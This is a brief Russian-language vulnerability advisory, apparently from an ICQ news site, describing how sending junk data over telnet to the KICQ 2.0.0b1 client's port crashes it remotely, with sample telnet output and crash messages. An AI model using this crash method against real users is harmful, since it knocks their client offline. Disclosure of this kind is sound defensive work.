ICQ Information Center: Удалённая атака на KICQ 2.0.0b1 Удалённая атака на KICQ 2.0.0b1
KICQ - это клиент, который был специально разработан для KDE. Уязвимость найдена в KICQ 2.0.0b1 использующей icqlib 1.0.0, а вот собственно говоря и само описание ошибки:
Для того, чтобы удалённо "повалить" KICQ, достаточно просто подсоединиться используя протокол telnet на порт, на котором работает KICQ и послать на него немного мусора:
bash-2.05$ telnet 10.0.0.1 1030
Trying 10.0.0.1...
Connected to 10.0.0.1.
Escape character is '^]'.
.... мусор ....
Connection closed by foreign host.
Клиент вылетит примерно со следующим сообщением:
KCrash: crashing.... crashRecursionCounter = 2
KCrash: Application Name = kicq path = <unknown>
На настоящее время необходимых патчей не находил. Возможно, стоит обратиться на сайт разработчика: http://sourceforge.net/projects/kicq